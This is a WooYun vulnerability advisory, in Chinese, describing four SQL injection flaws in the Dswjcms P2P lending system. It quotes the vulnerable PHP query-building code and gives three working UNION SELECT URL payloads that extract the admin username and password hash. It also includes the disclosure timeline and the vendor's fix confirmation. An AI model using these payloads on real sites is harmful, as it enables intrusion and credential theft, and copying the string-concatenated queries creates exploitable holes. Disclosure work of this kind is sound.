当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2015-141364

漏洞标题: Dswjcms p2p网贷系统前台4处sql注入

相关厂商: www.tifaweb.com

漏洞作者: 路人甲

提交时间: 2015-10-07 09:15

公开时间: 2016-01-11 15:36

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

1人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-12-02: 细节向核心白帽子及相关领域专家公开
2015-12-12: 细节向普通白帽子公开
2015-12-22: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

注入。官网demo

详细说明:

案例参照 http://**.**.**.**/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095。



-------------------------------------------------------------------------------------

#1



/Lib/Action/Win/IndexAction.class.php

code 区域
public function loanAjax(){


		$Borrowing = D('Borrowing');


		import('ORG.Util.Page');// 导入分页类


		$type=$this->_param('type')==0?'':"type =".($this->_param('type')-1);	//借款类型


		$state=$this->_param('state')==1?'(state=1 or state=10)':"state =".($this->_param('state'));	//借款状态


		$classify=$this->_param('classify')==0?'':"way =".($this->_param('classify')-1);	//还款方式


		$scope=$this->_param('scope')==0?'':"candra =".($this->_param('scope')-1);	//借款期限


		if($type || $state || $classify || $scope){


			$type=$type?$type." and ":'';


			$state=$state?$state." and ":'';


			$scope=$scope?$scope." and ":'';


			$classify=$classify?$classify." and ":'';


			$where=$type.$state.$scope.$classify;


			


		}


		


		//$where.='(state=1 or state=10)';


		$where.='min>1';


		$count      = $Borrowing->where($where)->count();


.........





当存在 state type classify scope 时。且state不为1即可直接拼接sql。



exp:

code 区域
Win/Index/loanAjax.html?type=1&state=0) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1



1.png





#2

/Lib/Action/Home/LoanAction.class.php

code 区域
public function loanAjax(){





		$Borrowing = D('Borrowing');


		import('ORG.Util.Page');// 导入分页类


		$type=$this->_param('type')==0?'':"type =".($this->_param('type')-1);	//借款类型


		$state=$this->_param('state')==0?'(state=1 or state=10)':"state =".($this->_param('state'));	//借款状态


		$classify=$this->_param('classify')==0?'':"way =".($this->_param('classify')-1);	//还款方式


		$scope=$this->_param('scope')==0?'':"candra =".($this->_param('scope')-1);	//借款期限


		if($type || $state || $classify || $scope){


			$type=$type?$type." and ":'';


			$state=$state?$state." and ":'';


			$scope=$scope?$scope." and ":'';


			$classify=$classify?$classify." and ":'';


			$where=$type.$state.$scope.$classify;


			


		}


		


		//$where.='(state=1 or state=10)';


		$where.='min>1';


		$count      = $Borrowing->where($where)->count()



当存在 state type classify scope 时。且state不为0即可直接拼接sql。



exp:

code 区域
Loan/loanAjax.html?type=1&state=1) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1



1.png





#3

D:/wamp/www/Lib/Action/Home/LoanAction.class.php

code 区域
public function index(){


		$Borrowing = D('Borrowing');


		import('ORG.Util.Page');// 导入分页类


			$where='(state=1 or state=5 or state=7 or state=9)';


		if($this->_get('search')){


			$where.=" and `title` LIKE '%".$this->_get('search')."%'";


		}


		$count      = $Borrowing->where($where)->count();// 查询满足要求的总记录数


		$Page       = new Page($count,10);// 实例化分页类 传入总记录数和每页显示的记录数数


		$show       = $Page->show();// 分页显示输出


		$borrow=$this->borrow_unicoms($where,$Page->firstRow.','.$Page->listRows,'`stick` DESC,`time` DESC');


		$this->assign('borrow',$borrow);


		$this->assign('page',$show);// 赋值分页输出


		//标题、关键字、描述


		$Site = D("Site");


		$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();


		$this->assign('si',$site);


		$active['loan']='active';


		$this->assign('active',$active);


		$endjs='


//AJAX分页



$this->_get('search') 接收search参数,然而tp这样接收参数只会对双引号编码,他是单引号包裹的。注入产生、

code 区域
Loan.html?search=%27%29+UNION+SELECT+1%2C2%2C3%2C%28select+concat%28username%2C0x5c%2Cpassword%29+from+ds_admin+limit+1%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%23



1.png





#4

www/Lib/Action/Home/IndexAction.class.php

code 区域
public function index(){


		$this->copyright();


		$where='state=1 or state=5 or state=7 or state=9';


		$borrow=$this->borrow_unicoms($where,'','`stick` DESC,`time` DESC');


		$this->assign('borrow',$borrow);


		//累计投资金额


		$borrowing = M('borrowing');


		$accumulate['sum']=$borrowing->where('`state`>1')->sum('money');


		//累计预期收益


		$money = M('money');


		$accumulate['benefit']=$money->sum('`stay_interest`+`make_interest`+`make_reward`');


		$this->assign('accumulate',$accumulate);


		//新闻中心


		$new=$this->someArticle(16,5);


		$this->assign('new',$new);


		$shuffling = M('shuffling');


		$shufflings=$shuffling->field('title,img,url')->order('`order` ASC')->select();


		$this->assign('shuff',$shufflings);


		$head="<link href='__PUBLIC__/css/jslides.css' rel='stylesheet'>";


		$this->assign('head',$head);


		//标题、关键字、描述


		$Site = D("Site");


		$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();





$_SERVER['REQUEST_URI'] 直接获取的,那么直接就注入了- -

漏洞证明:

1.png



修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-08 08:27

厂商回复:

此类问题已经处理,已在官方论坛贴出修复办法,并在新版本中已测试无法执行,感谢楼主的宝贵意见

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-01-11 15:46 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    0

    爷爷

    1# 回复此人

登录后才能发表评论,请先 登录